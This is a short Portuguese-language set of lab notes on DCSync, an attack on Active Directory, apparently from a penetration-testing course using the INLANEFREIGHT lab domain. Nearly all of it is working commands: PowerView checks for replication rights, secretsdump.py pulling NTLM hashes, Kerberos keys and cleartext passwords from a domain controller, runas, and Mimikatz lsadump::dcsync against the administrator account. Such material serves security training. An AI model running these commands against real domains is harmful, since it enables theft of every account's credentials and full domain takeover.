DCSync

O DCSync é uma técnica para roubar o banco de dados de senhas do Active Directory usando o , que é usado pelos controladores de domínio para replicar dados de domínio. Isso permite que um invasor imite um controlador de domínio para recuperar hashes de senha NTLM do usuário.Directory Replication Service Remote Protocol

• Usando Get-DomainUser para exibir a associação de grupo do adunn

Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof,useraccountcontrol |fl

• Usando Get-ObjectAcl para verificar os direitos de replicação do adunn

$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

• Extraindo hashes NTLM e chaves Kerberos usando secretsdump.py

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 

• Listando hashes, chaves Kerberos e senhas de texto não criptografado

 ls inlanefreight_hashes*

• Enumerando ainda mais usando Get-ADUser

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

• Verificando a opção de criptografia reversível usando Get-DomainUser

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

• Exibindo a senha descriptografada

cat inlanefreight_hashes.ntds.cleartext 

• Usando runas.exe

runas /netonly /user:INLANEFREIGHT\adunn powershell

Realizando o ataque com Mimikatz

.\mimikatz.exe
mimikatz #privilege::debug
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator